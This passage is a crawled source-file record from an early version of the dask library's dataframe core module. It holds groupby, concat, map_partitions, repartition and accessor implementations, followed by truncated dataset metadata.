name)\n DataFrame._bind_operator_method(name, meth)\n\n meth = getattr(pd.Series, name)\n Series._bind_operator_method(name, meth)\n\n\ndef elemwise_property(attr, s):\n return map_partitions(getattr, s.name, s, attr)\n\nfor name in ['nanosecond', 'microsecond', 'millisecond', 'second', 'minute',\n 'hour', 'day', 'week', 'month', 'quarter', 'year']:\n setattr(Index, name, property(partial(elemwise_property, name)))\n\n\ndef nlargest(df, n=5, columns=None):\n if isinstance(df, Index):\n raise AttributeError(\"nlargest is not available for Index objects\")\n elif isinstance(df, Series):\n token = 'series-nlargest-n={0}'.format(n)\n f = lambda s: s.nlargest(n)\n elif isinstance(df, DataFrame):\n token = 'dataframe-nlargest-n={0}'.format(n)\n f = lambda df: df.nlargest(n, columns)\n columns = df.columns # this is a hack.\n return aca(df, f, f, columns=columns, token=token)\n\n\ndef _assign(df, *pairs):\n kwargs = dict(partition(2, pairs))\n return df.assign(**kwargs)\n\n\ndef _partition_of_index_value(divisions, val):\n \"\"\" In which partition does this value lie?\n\n >>> _partition_of_index_value([0, 5, 10], 3)\n 0\n >>> _partition_of_index_value([0, 5, 10], 8)\n 1\n >>> _partition_of_index_value([0, 5, 10], 100)\n 1\n >>> _partition_of_index_value([0, 5, 10], 5) # left-inclusive divisions\n 1\n \"\"\"\n if divisions[0] is None:\n raise ValueError(\n \"Can not use loc on DataFrame without known divisions\")\n val = _coerce_loc_index(divisions, val)\n i = bisect.bisect_right(divisions, val)\n return min(len(divisions) - 2, max(0, i - 1))\n\n\ndef _loc(df, start, stop, include_right_boundary=True):\n \"\"\"\n\n >>> df = pd.DataFrame({'x': [10, 20, 30, 40, 50]}, index=[1, 2, 2, 3, 4])\n >>> _loc(df, 2, None)\n x\n 2 20\n 2 30\n 3 40\n 4 50\n >>> _loc(df, 1, 3)\n x\n 1 10\n 2 20\n 2 30\n 3 40\n >>> _loc(df, 1, 3, include_right_boundary=False)\n x\n 1 10\n 2 20\n 2 30\n \"\"\"\n result = df.loc[start:stop]\n if not include_right_boundary:\n right_index = result.index.get_slice_bound(stop, 'left',\n result.index.inferred_type)\n result = result.iloc[:right_index]\n return result\n\n\ndef _coerce_loc_index(divisions, o):\n \"\"\" Transform values to be comparable against divisions\n\n This is particularly valuable to use with pandas datetimes\n \"\"\"\n if divisions and isinstance(divisions[0], datetime):\n return pd.Timestamp(o)\n if divisions and 
isinstance(divisions[0], np.datetime64):\n return np.datetime64(o)\n return o\n\n\ndef consistent_name(names):\n \"\"\" New name for series in elementwise operation\n\n If all truthy names are the same, choose that one, otherwise, choose None\n \"\"\"\n allnames = set()\n for name in names:\n if name is None:\n continue\n if isinstance(name, (tuple, list)):\n allnames.update(name)\n else:\n allnames.add(name)\n\n if len(allnames) == 1:\n return first(allnames)\n else:\n return None\n\n\ndef elemwise(op, *args, **kwargs):\n \"\"\" Elementwise operation for dask.Dataframes \"\"\"\n columns = kwargs.get('columns', None)\n name = kwargs.get('name', None)\n\n _name = 'elemwise-' + tokenize(op, kwargs, *args)\n\n args = _maybe_from_pandas(args)\n\n from .multi import _maybe_align_partitions\n args = _maybe_align_partitions(args)\n dasks = [arg for arg in args if isinstance(arg, (_Frame, Scalar))]\n dfs = [df for df in dasks if isinstance(df, _Frame)]\n divisions = dfs[0].divisions\n n = len(divisions) - 1\n\n other = [(i, arg) for i, arg in enumerate(args)\n if not isinstance(arg, (_Frame, Scalar))]\n\n if other:\n op2 = partial_by_order(op, other)\n else:\n op2 = op\n\n # adjust the key length of Scalar\n keys = [d._keys() * n if isinstance(d, Scalar)\n else d._keys() for d in dasks]\n\n dsk = dict(((_name, i), (op2,) + frs) for i, frs in enumerate(zip(*keys)))\n dsk = merge(dsk, *[d.dask for d in dasks])\n\n if columns is not None:\n return DataFrame(dsk, _name, columns, divisions)\n else:\n column_name = name or consistent_name(n for df in dfs\n for n in df.columns)\n return Series(dsk, _name, column_name, divisions)\n\n\ndef remove_empties(seq):\n \"\"\" Remove items of length 0\n\n >>> remove_empties([1, 2, ('empty', np.nan), 4, 5])\n [1, 2, 4, 5]\n\n >>> remove_empties([('empty', np.nan)])\n [nan]\n\n >>> remove_empties([])\n []\n \"\"\"\n if not seq:\n return seq\n\n seq2 = [x for x in seq\n if not (isinstance(x, tuple) and x and x[0] == 'empty')]\n if seq2:\n return seq2\n else:\n return [seq[0][1]]\n\n\ndef empty_safe(func, arg):\n \"\"\"\n\n >>> empty_safe(sum, [1, 2, 3])\n 6\n >>> empty_safe(sum, [])\n ('empty', 0)\n \"\"\"\n if len(arg) == 0:\n return ('empty', func(arg))\n else:\n return func(arg)\n\n\ndef reduction(x, chunk, aggregate, token=None):\n \"\"\" General version of reductions\n\n >>> reduction(my_frame, np.sum, np.sum) # doctest: +SKIP\n \"\"\"\n token_key = tokenize(x, token or (chunk, aggregate))\n token = token or 'reduction'\n a = '{0}--chunk-{1}'.format(token, token_key)\n dsk = dict(((a, i), (empty_safe, chunk, (x._name, i)))\n for i in range(x.npartitions))\n\n b = '{0}--aggregation-{1}'.format(token, token_key)\n dsk2 = {(b, 0): (aggregate, (remove_empties,\n [(a,i) for i in range(x.npartitions)]))}\n\n return Scalar(merge(x.dask, dsk, dsk2), b)\n\n\ndef _concat_dfs(dfs, name, join='outer'):\n \"\"\" Internal function to concat dask dict and DataFrame.columns \"\"\"\n dsk = dict()\n i = 0\n\n empties = [df._empty_partition for df in dfs]\n result = pd.concat(empties, axis=0, join=join)\n if isinstance(result, pd.Series):\n columns = result.name\n else:\n columns = result.columns.tolist()\n\n for df in dfs:\n if columns != df.columns:\n df = df[[c for c in columns if c in df.columns]]\n dsk = merge(dsk, df.dask)\n\n for key in df._keys():\n dsk[(name, i)] = key\n i += 1\n\n return dsk, columns\n\ndef _maybe_from_pandas(dfs):\n from .io import from_pandas\n dfs = [from_pandas(df, 1) if isinstance(df, (pd.DataFrame, pd.Series))\n else df for df in dfs]\n return 
dfs\n\n\ndef concat(dfs, axis=0, join='outer', interleave_partitions=False):\n    \"\"\" Concatenate DataFrames along rows.\n\n    - When axis=0 (default), concatenate DataFrames row-wise:\n      - If all divisions are known and ordered, concatenate DataFrames keeping\n        divisions. When divisions are not ordered, specifying\n        interleave_partitions=True allows concatenating them one by one.\n      - If any division is unknown, concatenate DataFrames resetting the\n        divisions to unknown (None)\n    - When axis=1, concatenate DataFrames column-wise:\n      - Allowed if all divisions are known.\n      - If any division is unknown, a ValueError is raised.\n\n    Parameters\n    ----------\n\n    dfs: list\n        List of dask.DataFrames to be concatenated\n    axis: {0, 1, 'index', 'columns'}, default 0\n        The axis to concatenate along\n    join : {'inner', 'outer'}, default 'outer'\n        How to handle indexes on other axis\n    interleave_partitions: bool, default False\n        Whether to concatenate DataFrames ignoring their order. If True,\n        divisions are concatenated one by one.\n\n    Examples\n    --------\n\n    # If all divisions are known and ordered, divisions are kept.\n    >>> a  # doctest: +SKIP\n    dd.DataFrame\n    >>> b  # doctest: +SKIP\n    dd.DataFrame\n    >>> dd.concat([a, b])  # doctest: +SKIP\n    dd.DataFrame\n\n    # Unable to concatenate if divisions are not ordered.\n    >>> a  # doctest: +SKIP\n    dd.DataFrame\n    >>> b  # doctest: +SKIP\n    dd.DataFrame\n    >>> dd.concat([a, b])  # doctest: +SKIP\n    ValueError: All inputs have known divisions which cannot be concatenated\n    in order. Specify interleave_partitions=True to ignore order\n\n    # Specify interleave_partitions=True to ignore the division order.\n    >>> dd.concat([a, b], interleave_partitions=True)  # doctest: +SKIP\n    dd.DataFrame\n\n    # If any division is unknown, the result divisions will be unknown\n    >>> a  # doctest: +SKIP\n    dd.DataFrame\n    >>> b  # doctest: +SKIP\n    dd.DataFrame\n    >>> dd.concat([a, b])  # doctest: +SKIP\n    dd.DataFrame\n    \"\"\"\n    if not isinstance(dfs, list):\n        dfs = [dfs]\n    if len(dfs) == 0:\n        raise ValueError('Input must be a non-empty list')\n\n    if join not in ('inner', 'outer'):\n        raise ValueError(\"'join' must be 'inner' or 'outer'\")\n\n    axis = DataFrame._validate_axis(axis)\n    dasks = [df for df in dfs if isinstance(df, _Frame)]\n\n    if all(df.known_divisions for df in dasks):\n        # must be converted here to check whether divisions can be\n        # concatenated\n        dfs = _maybe_from_pandas(dfs)\n        if axis == 1:\n            from .multi import concat_indexed_dataframes\n            return concat_indexed_dataframes(dfs, axis=axis, join=join)\n        else:\n            # each DataFrame's divisions must be greater than the previous one's\n            if all(dfs[i].divisions[-1] < dfs[i + 1].divisions[0]\n                   for i in range(len(dfs) - 1)):\n                name = 'concat-{0}'.format(tokenize(*dfs))\n                dsk, columns = _concat_dfs(dfs, name, join=join)\n\n                divisions = []\n                for df in dfs[:-1]:\n                    # remove last to concatenate with next\n                    divisions += df.divisions[:-1]\n                divisions += dfs[-1].divisions\n\n                return_type = _get_return_type(dfs[0], columns)\n                return return_type(merge(dsk, *[df.dask for df in dfs]), name,\n                                   columns, divisions)\n            else:\n                if interleave_partitions:\n                    from .multi import concat_indexed_dataframes\n                    return concat_indexed_dataframes(dfs, join=join)\n\n                raise ValueError('All inputs have known divisions which cannot '\n                                 'be concatenated in order. 
Specify '\n 'interleave_partitions=True to ignore order')\n\n else:\n if axis == 1:\n raise ValueError('Unable to concatenate DataFrame with unknown '\n 'division specifying axis=1')\n else:\n # concat will not regard Series as row\n dfs = _maybe_from_pandas(dfs)\n name = 'concat-{0}'.format(tokenize(*dfs))\n dsk, columns = _concat_dfs(dfs, name, join=join)\n\n divisions = [None] * (sum([df.npartitions for df in dfs]) + 1)\n\n return_type = _get_return_type(dfs[0], columns)\n return return_type(merge(dsk, *[df.dask for df in dfs]), name,\n columns, divisions)\n\n\ndef _groupby_apply(df, ind, func):\n return df.groupby(ind).apply(func)\n\ndef _groupby_apply_level0(df, func):\n return df.groupby(level=0).apply(func)\n\ndef _groupby_getitem_apply(df, ind, key, func):\n return df.groupby(ind)[key].apply(func)\n\ndef _groupby_level0_getitem_apply(df, key, func):\n return df.groupby(level=0)[key].apply(func)\n\ndef _groupby_get_group(df, by_key, get_key, columns):\n grouped = df.groupby(by_key)\n if isinstance(columns, tuple):\n columns = list(columns)\n if get_key in grouped.groups:\n return grouped[columns].get_group(get_key)\n else:\n # to create empty DataFrame/Series, which has the same\n # dtype as the original\n return df[0:0][columns]\n\n\nclass _GroupBy(object):\n\n def _aca_agg(self, token, func, aggfunc=None):\n if aggfunc is None:\n aggfunc = func\n\n if isinstance(self.index, Series):\n\n def chunk(df, index, func=func, key=self.key):\n if isinstance(df, pd.Series):\n return func(df.groupby(index))\n else:\n return func(df.groupby(index)[key])\n\n agg = lambda df: aggfunc(df.groupby(level=0))\n token = self._token_prefix + token\n\n return aca([self.df, self.index], chunk=chunk, aggregate=agg,\n columns=self.key, token=token)\n else:\n def chunk(df, index=self.index, func=func, key=self.key):\n return func(df.groupby(index)[key])\n\n if isinstance(self.index, list):\n levels = list(range(len(self.index)))\n else:\n levels = 0\n agg = lambda df: aggfunc(df.groupby(level=levels))\n token = self._token_prefix + token\n\n return aca(self.df, chunk=chunk, aggregate=agg,\n columns=self.key, token=token)\n\n @wraps(pd.core.groupby.GroupBy.sum)\n def sum(self):\n return self._aca_agg(token='sum', func=lambda x: x.sum())\n\n @wraps(pd.core.groupby.GroupBy.min)\n def min(self):\n return self._aca_agg(token='min', func=lambda x: x.min())\n\n @wraps(pd.core.groupby.GroupBy.max)\n def max(self):\n return self._aca_agg(token='max', func=lambda x: x.max())\n\n @wraps(pd.core.groupby.GroupBy.count)\n def count(self):\n return self._aca_agg(token='count', func=lambda x: x.count(),\n aggfunc=lambda x: x.sum())\n\n @wraps(pd.core.groupby.GroupBy.mean)\n def mean(self):\n return 1.0 * self.sum() / self.count()\n\n def get_group(self, key):\n token = self._token_prefix + 'get_group'\n return map_partitions(_groupby_get_group, self.column_info,\n self.df,\n self.index, key, self.column_info, token=token)\n\n\nclass GroupBy(_GroupBy):\n\n _token_prefix = 'dataframe-groupby-'\n\n def __init__(self, df, index=None, key=None, **kwargs):\n self.df = df\n self.index = index\n self.kwargs = kwargs\n\n if isinstance(index, list):\n for i in index:\n if i not in df.columns:\n raise KeyError(\"Columns not found: '{0}'\".format(i))\n _key = [c for c in df.columns if c not in index]\n\n elif isinstance(index, Series):\n assert index.divisions == df.divisions\n # check whether given Series is taken from given df and unchanged.\n # If any operations are performed, _name will be changed to\n # e.g. 
\"elemwise-xxxx\"\n if (index.name is not None and\n index._name == self.df._name + '.' + index.name):\n _key = [c for c in df.columns if c != index.name]\n else:\n _key = list(df.columns)\n else:\n if index not in df.columns:\n raise KeyError(\"Columns not found: '{0}'\".format(index))\n _key = [c for c in df.columns if c != index]\n\n self.key = key or _key\n\n @property\n def column_info(self):\n return self.df.columns\n\n def apply(self, func, columns=None):\n \"\"\" Apply function to each group.\n\n If the grouper does not align with the index then this causes a full\n shuffle. The order of rows within each group may not be preserved.\n \"\"\"\n if (isinstance(self.index, Series) and\n self.index._name == self.df.index._name):\n df = self.df\n return map_partitions(_groupby_apply_level0,\n columns or self.df.columns,\n self.df, func)\n else:\n from .shuffle import shuffle\n # df = set_index(self.df, self.index, **self.kwargs)\n df = shuffle(self.df, self.index, **self.kwargs)\n return map_partitions(_groupby_apply,\n columns or self.df.columns,\n self.df, self.index, func)\n\n def __getitem__(self, key):\n if isinstance(key, list):\n for k in key:\n if k not in self.df.columns:\n raise KeyError(\"Columns not found: '{0}'\".format(k))\n return GroupBy(self.df, index=self.index, key=key, **self.kwargs)\n else:\n if key not in self.df.columns:\n raise KeyError(\"Columns not found: '{0}'\".format(key))\n return SeriesGroupBy(self.df, self.index, key)\n\n def __dir__(self):\n return sorted(set(dir(type(self)) + list(self.__dict__) +\n list(self.df.columns)))\n\n def __getattr__(self, key):\n try:\n return object.__getattribute__(self, key)\n except AttributeError:\n try:\n return self[key]\n except KeyError:\n raise AttributeError()\n\n\nclass SeriesGroupBy(_GroupBy):\n\n _token_prefix = 'series-groupby-'\n\n def __init__(self, df, index, key=None, **kwargs):\n self.df = df\n self.index = index\n self.key = key\n self.kwargs = kwargs\n\n if isinstance(df, Series):\n if not isinstance(index, Series):\n raise TypeError(\"A dask Series must be used as the index for a\"\n \" Series groupby.\")\n if not df.divisions == index.divisions:\n raise NotImplementedError(\"The Series and index of the groupby\"\n \" must have the same divisions.\")\n\n @property\n def column_info(self):\n return self.key\n\n def apply(self, func, columns=None):\n \"\"\" Apply function to each group.\n\n If the grouper does not align with the index then this causes a full\n shuffle. 
The order of rows within each group may not be preserved.\n        \"\"\"\n        # df = set_index(self.df, self.index, **self.kwargs)\n        if self.index._name == self.df.index._name:\n            df = self.df\n            return map_partitions(_groupby_level0_getitem_apply,\n                                  columns or self.key,\n                                  df, self.key, func)\n        else:\n            from .shuffle import shuffle\n            df = shuffle(self.df, self.index, **self.kwargs)\n            return map_partitions(_groupby_apply,\n                                  columns or self.df.columns,\n                                  df, self.index, func)\n\n    def nunique(self):\n        def chunk(df, index):\n            # we call set_index here to force a possibly duplicate index\n            # for our reduce step\n            grouped = (df.groupby(index)\n                       .apply(pd.DataFrame.drop_duplicates, subset=self.key))\n            grouped.index = grouped.index.get_level_values(level=0)\n            return grouped\n\n        def agg(df):\n            return df.groupby(level=0)[self.key].nunique()\n\n        return aca([self.df, self.index],\n                   chunk=chunk, aggregate=agg, columns=self.key,\n                   token='series-groupby-nunique')\n\n\ndef apply_concat_apply(args, chunk=None, aggregate=None,\n                       columns=no_default, token=None):\n    \"\"\" Apply a function to blocks, then concat, then apply again\n\n    Parameters\n    ----------\n\n    args: dask.DataFrames\n        All DataFrames should be partitioned and indexed equivalently\n    chunk: function [block-per-arg] -> block\n        Function to operate on each block of data\n    aggregate: function concatenated-block -> block\n        Function to operate on the concatenated result of chunk\n\n    >>> def chunk(a_block, b_block):\n    ...     pass\n\n    >>> def agg(df):\n    ...     pass\n\n    >>> apply_concat_apply([a, b], chunk=chunk, aggregate=agg)  # doctest: +SKIP\n    \"\"\"\n    if not isinstance(args, (tuple, list)):\n        args = [args]\n\n    assert all(arg.npartitions == args[0].npartitions\n               for arg in args\n               if isinstance(arg, _Frame))\n\n    token_key = tokenize(token or (chunk, aggregate), columns, *args)\n    token = token or 'apply-concat-apply'\n\n    a = '{0}--first-{1}'.format(token, token_key)\n    dsk = dict(((a, i), (apply, chunk, (list, [(x._name, i)\n                                               if isinstance(x, _Frame)\n                                               else x for x in args])))\n               for i in range(args[0].npartitions))\n\n    b = '{0}--second-{1}'.format(token, token_key)\n    dsk2 = {(b, 0): (aggregate,\n                     (_concat,\n                      (list, [(a, i) for i in range(args[0].npartitions)])))}\n\n    if columns == no_default:\n        return_type = type(args[0])\n        columns = None\n    else:\n        return_type = _get_return_type(args[0], columns)\n\n    dasks = [a.dask for a in args if isinstance(a, _Frame)]\n    return return_type(merge(dsk, dsk2, *dasks), b, columns, [None, None])\n\n\naca = apply_concat_apply\n\n\ndef _get_return_type(arg, columns):\n    \"\"\" Get the class of the result\n\n    - When columns is str/unicode, the result is:\n       - Scalar when columns is ``return_scalar``\n       - Index if arg is Index\n       - Series otherwise\n    - Otherwise, result is DataFrame.\n    \"\"\"\n\n    if (isinstance(columns, (str, unicode)) or not\n          isinstance(columns, Iterable)):\n\n        if columns == return_scalar:\n            return Scalar\n\n        elif isinstance(arg, Index):\n            return Index\n        else:\n            return Series\n    else:\n        return DataFrame\n\n\ndef map_partitions(func, columns, *args, **kwargs):\n    \"\"\" Apply Python function on each DataFrame block\n\n    columns: tuple or string\n        Column names or name of the output\n    args: list\n        List of target DataFrame / Series.\n    \"\"\"\n    assert callable(func)\n    token = kwargs.pop('token', 'map-partitions')\n    token_key = tokenize(token or func, columns, kwargs, *args)\n    name = '{0}-{1}'.format(token, token_key)\n\n    if all(isinstance(arg, Scalar) for arg in args):\n        dask = {(name, 0):\n                (apply, func, (tuple, [(arg._name, 
0) for arg in args]), kwargs)}\n        return Scalar(merge(dask, *[arg.dask for arg in args]), name)\n\n    args = _maybe_from_pandas(args)\n\n    if columns is no_default:\n        columns = None\n\n    from .multi import _maybe_align_partitions\n    args = _maybe_align_partitions(args)\n    dfs = [df for df in args if isinstance(df, _Frame)]\n\n    return_type = _get_return_type(dfs[0], columns)\n    dsk = {}\n    for i in range(dfs[0].npartitions):\n        values = [(arg._name, i if isinstance(arg, _Frame) else 0)\n                  if isinstance(arg, (_Frame, Scalar)) else arg for arg in args]\n        dsk[(name, i)] = (_rename, columns, (apply, func, (tuple, values),\n                                             kwargs))\n\n    dasks = [arg.dask for arg in args if isinstance(arg, (_Frame, Scalar))]\n\n    return return_type(merge(dsk, *dasks), name, columns, args[0].divisions)\n\n\ndef _rename(columns, df):\n    \"\"\" Rename columns in dataframe or series \"\"\"\n    if isinstance(columns, Iterator):\n        columns = list(columns)\n    if columns is no_default:\n        return df\n    if isinstance(df, pd.DataFrame) and len(columns) == len(df.columns):\n        return df.rename(columns=dict(zip(df.columns, columns)))\n    elif isinstance(df, pd.Series):\n        return pd.Series(df, name=columns)\n    else:\n        return df\n\n\ndef categorize_block(df, categories):\n    \"\"\" Categorize a dataframe with given categories\n\n    df: DataFrame\n    categories: dict mapping column name to iterable of categories\n    \"\"\"\n    df = df.copy()\n    for col, vals in categories.items():\n        df[col] = pd.Categorical(df[col], categories=vals, ordered=False)\n    return df\n\n\ndef categorize(df, columns=None, **kwargs):\n    \"\"\"\n    Convert columns of dataframe to category dtype\n\n    This aids performance, both in-memory and in spilling to disk\n    \"\"\"\n    if columns is None:\n        dtypes = df.dtypes\n        columns = [name for name, dt in zip(dtypes.index, dtypes.values)\n                   if dt == 'O']\n    if not isinstance(columns, (list, tuple)):\n        columns = [columns]\n\n    distincts = [df[col].drop_duplicates() for col in columns]\n    values = compute(*distincts, **kwargs)\n\n    func = partial(categorize_block, categories=dict(zip(columns, values)))\n    return df.map_partitions(func, columns=df.columns)\n\n\ndef quantile(df, q):\n    \"\"\" Approximate quantiles of Series / single column DataFrame\n\n    Parameters\n    ----------\n    q : list/array of floats\n        Iterable of numbers ranging from 0 to 1 for the desired quantiles\n    \"\"\"\n    assert len(df.columns) == 1\n    from dask.array.percentile import _percentile, merge_percentiles\n\n    # currently, only Series has quantile method\n    if isinstance(q, (list, tuple, np.ndarray)):\n        # make Series\n        merge_type = lambda v: df._partition_type(v, index=q, name=df.name)\n        return_type = df._constructor\n        if issubclass(return_type, Index):\n            return_type = Series\n    else:\n        merge_type = lambda v: df._partition_type(v).item()\n        return_type = df._constructor_sliced\n        q = [q]\n\n    # pandas uses quantile in [0, 1]\n    # numpy / everyone else uses [0, 100]\n    qs = np.asarray(q) * 100\n    token = tokenize(df, qs)\n\n    if len(qs) == 0:\n        name = 'quantiles-' + token\n        return Series({(name, 0): pd.Series([], name=df.name)},\n                      name, df.name, [None, None])\n    else:\n        new_divisions = [np.min(q), np.max(q)]\n\n    name = 'quantiles-1-' + token\n    val_dsk = dict(((name, i), (_percentile, (getattr, key, 'values'), qs))\n                   for i, key in enumerate(df._keys()))\n    name2 = 'quantiles-2-' + token\n    len_dsk = dict(((name2, i), (len, key)) for i, key in enumerate(df._keys()))\n\n    name3 = 'quantiles-3-' + token\n    merge_dsk = {(name3, 0): (merge_type, (merge_percentiles, qs, [qs] * df.npartitions,\n                                           sorted(val_dsk), 
sorted(len_dsk)))}\n    dsk = merge(df.dask, val_dsk, len_dsk, merge_dsk)\n    return return_type(dsk, name3, df.name, new_divisions)\n\n\ndef pd_split(df, p, seed=0):\n    \"\"\" Split DataFrame into multiple pieces pseudorandomly\n\n    >>> df = pd.DataFrame({'a': [1, 2, 3, 4, 5, 6],\n    ...                    'b': [2, 3, 4, 5, 6, 7]})\n\n    >>> a, b = pd_split(df, [0.5, 0.5], seed=123)  # roughly 50/50 split\n    >>> a\n       a  b\n    1  2  3\n    2  3  4\n    5  6  7\n\n    >>> b\n       a  b\n    0  1  2\n    3  4  5\n    4  5  6\n    \"\"\"\n    p = list(p)\n    index = pseudorandom(len(df), p, seed)\n    return [df.iloc[index == i] for i in range(len(p))]\n\n\ndef repartition_divisions(a, b, name, out1, out2, force=False):\n    \"\"\" dask graph to repartition dataframe by new divisions\n\n    Parameters\n    ----------\n    a: tuple\n        old divisions\n    b: tuple, list\n        new divisions\n    name: str\n        name of old dataframe\n    out1: str\n        name of temporary splits\n    out2: str\n        name of new dataframe\n    force: bool, default False\n        Allows the expansion of the existing divisions.\n        If False then the new divisions lower and upper bounds must be\n        the same as the old divisions.\n\n    >>> repartition_divisions([1, 3, 7], [1, 4, 6, 7], 'a', 'b', 'c')  # doctest: +SKIP\n    {('b', 0): (<function _loc at ...>, ('a', 0), 1, 3, False),\n     ('b', 1): (<function _loc at ...>, ('a', 1), 3, 4, False),\n     ('b', 2): (<function _loc at ...>, ('a', 1), 4, 6, False),\n     ('b', 3): (<function _loc at ...>, ('a', 1), 6, 7, False)\n     ('c', 0): (<function concat at ...>,\n                (<type 'list'>, [('b', 0), ('b', 1)])),\n     ('c', 1): ('b', 2),\n     ('c', 2): ('b', 3)}\n    \"\"\"\n\n    if not isinstance(b, (list, tuple)):\n        raise ValueError('New division must be list or tuple')\n    b = list(b)\n\n    if len(b) < 2:\n        # minimum division is 2 elements, like [0, 0]\n        raise ValueError('New division must have at least 2 elements')\n\n    if b != sorted(b):\n        raise ValueError('New division must be sorted')\n    if len(b[:-1]) != len(list(unique(b[:-1]))):\n        msg = 'New division must be unique, except for the last element'\n        raise ValueError(msg)\n\n    if force:\n        if a[0] < b[0]:\n            msg = ('left side of the new division must be equal or smaller '\n                   'than old division')\n            raise ValueError(msg)\n        if a[-1] > b[-1]:\n            msg = ('right side of the new division must be equal or larger '\n                   'than old division')\n            raise ValueError(msg)\n    else:\n        if a[0] != b[0]:\n            msg = 'left side of old and new divisions are different'\n            raise ValueError(msg)\n        if a[-1] != b[-1]:\n            msg = 'right side of old and new divisions are different'\n            raise ValueError(msg)\n\n    def _is_single_last_div(x):\n        \"\"\"Whether last division only contains single label\"\"\"\n        return len(x) >= 2 and x[-1] == x[-2]\n\n    c = [a[0]]\n    d = dict()\n    low = a[0]\n\n    i, j = 1, 1  # indices for old/new divisions\n    k = 0        # index for temp divisions\n\n    last_elem = _is_single_last_div(a)\n\n    # process through old division\n    # left part of new division can be processed in this loop\n    while (i < len(a) and j < len(b)):\n        if a[i] < b[j]:\n            # tuple is something like:\n            # (_loc, ('from_pandas-#', 0), 3, 4, False))\n            d[(out1, k)] = (_loc, (name, i - 1), low, a[i], False)\n            low = a[i]\n            i += 1\n        elif a[i] > b[j]:\n            d[(out1, k)] = (_loc, (name, i - 1), low, b[j], False)\n            low = b[j]\n            j += 1\n        else:\n            d[(out1, k)] = (_loc, (name, i - 1), low, b[j], False)\n            low = b[j]\n            i += 1\n            j += 1\n        c.append(low)\n        k += 1\n\n    # right part of new division can remain\n    if a[-1] < b[-1]:\n        for _j in range(j, len(b)):\n            # always use right-most of old division\n            # because it may contain last element\n            m = len(a) - 2\n            d[(out1, k)] = (_loc, (name, m), low, b[_j], False)\n            low = b[_j]\n            c.append(low)\n            k += 1\n    else:\n        # even if new division is processed through,\n        # right-most 
element of old division can remain\n        if last_elem and i < len(a):\n            d[(out1, k)] = (_loc, (name, i - 1), a[i], a[i], False)\n            k += 1\n        c.append(a[-1])\n\n    # replace last element of tuple with True\n    d[(out1, k - 1)] = d[(out1, k - 1)][:-1] + (True,)\n\n    i, j = 0, 1\n\n    last_elem = _is_single_last_div(c)\n\n    while j < len(b):\n        tmp = []\n        while c[i] < b[j]:\n            tmp.append((out1, i))\n            i += 1\n        if last_elem and c[i] == b[-1] and i < k:\n            # append if last split is not included\n            tmp.append((out1, i))\n            i += 1\n        if len(tmp) == 0:\n            # dummy slice to return an empty DataFrame or Series,\n            # which retains the original data attributes (columns / name)\n            d[(out2, j - 1)] = (_loc, (name, 0), a[0], a[0], False)\n        elif len(tmp) == 1:\n            d[(out2, j - 1)] = tmp[0]\n        else:\n            if not tmp:\n                raise ValueError('check for duplicate partitions\\nold:\\n%s\\n\\n'\n                                 'new:\\n%s\\n\\ncombined:\\n%s'\n                                 % (pformat(a), pformat(b), pformat(c)))\n            d[(out2, j - 1)] = (pd.concat, (list, tmp))\n        j += 1\n    return d\n\n\ndef repartition(df, divisions, force=False):\n    \"\"\" Repartition dataframe along new divisions\n\n    Dask.DataFrame objects are partitioned along their index. Often when\n    multiple dataframes interact we need to align these partitionings. The\n    ``repartition`` function constructs a new DataFrame object holding the same\n    data but partitioned on different values. It does this by performing a\n    sequence of ``loc`` and ``concat`` calls to split and merge the previous\n    generation of partitions.\n\n    Parameters\n    ----------\n\n    divisions: list\n        List of partitions to be used\n    force: bool, default False\n        Allows the expansion of the existing divisions.\n        If False then the new divisions lower and upper bounds must be\n        the same as the old divisions.\n\n    >>> df = df.repartition([0, 5, 10, 20])  # doctest: +SKIP\n\n    Also works on Pandas objects\n\n    >>> ddf = dd.repartition(df, [0, 5, 10, 20])  # doctest: +SKIP\n    \"\"\"\n    token = tokenize(df, divisions)\n    if isinstance(df, _Frame):\n        tmp = 'repartition-split-' + token\n        out = 'repartition-merge-' + token\n        dsk = repartition_divisions(df.divisions, divisions,\n                                    df._name, tmp, out, force=force)\n        return df._constructor(merge(df.dask, dsk), out,\n                               df.column_info, divisions)\n    elif isinstance(df, pd.core.generic.NDFrame):\n        name = 'repartition-dataframe-' + token\n        dfs = shard_df_on_index(df, divisions[1:-1])\n        dsk = dict(((name, i), df) for i, df in enumerate(dfs))\n        if isinstance(df, pd.DataFrame):\n            return DataFrame(dsk, name, df.columns, divisions)\n        if isinstance(df, pd.Series):\n            return Series(dsk, name, df.name, divisions)\n    raise ValueError('Data must be DataFrame or Series')\n\n\nclass Accessor(object):\n    def __init__(self, series):\n        if not isinstance(series, Series):\n            raise ValueError('Accessor cannot be initialized')\n        self._series = series\n\n    def _property_map(self, key):\n        return map_partitions(self.getattr, self._series.name, self._series, key)\n\n    def _function_map(self, key, *args):\n        return map_partitions(self.call, self._series.name, self._series, key,\n                              *args)\n\n    def __dir__(self):\n        return sorted(set(dir(type(self)) + list(self.__dict__) +\n                      dir(self.ns)))\n\n    def __getattr__(self, key):\n        try:\n            return object.__getattribute__(self, key)\n        except AttributeError:\n            if key in dir(self.ns):\n                if isinstance(getattr(self.ns, key), property):\n                    return self._property_map(key)\n                else:\n                    return partial(self._function_map, key)\n            else:\n                raise\n\nclass DatetimeAccessor(Accessor):\n    \"\"\" Accessor object for datetimelike properties of the Series values.\n\n    Examples\n    
--------\n\n >>> s.dt.microsecond # doctest: +SKIP\n \"\"\"\n ns = pd.Series.dt\n\n @staticmethod\n def getattr(obj, attr):\n return getattr(obj.dt, attr)\n\n @staticmethod\n def call(obj, attr, *args):\n return getattr(obj.dt, attr)(*args)\n\n\n\nclass StringAccessor(Accessor):\n \"\"\" Accessor object for string properties of the Series values.\n\n Examples\n --------\n\n >>> s.str.lower() # doctest: +SKIP\n \"\"\"\n ns = pd.Series.str\n\n @staticmethod\n def getattr(obj, attr):\n return getattr(obj.str, attr)\n\n @staticmethod\n def call(obj, attr, *args):\n return getattr(obj.str, attr)(*args)\n", "repo_name": "clarkfitzg/dask", "sub_path": "dask/dataframe/core.py", "file_name": "core.py", "file_ext": "py", "file_size_in_byte": 85367, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "github-code", "pt": "61", "api": [{"api_name": "chest.Chest", "line_number": 21, "usage_type": "name"}, {"api_name": "pandas.computation.expressions.set_use_numexpr", "line_number": 35, "usage_type": "call"}, {"api_name": "pandas.computation", "line_number": 35, "usage_type": "attribute"}, {"api_name": "toolz.first", "line_number": 41, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 41, "usage_type": "attribute"}, {"api_name": 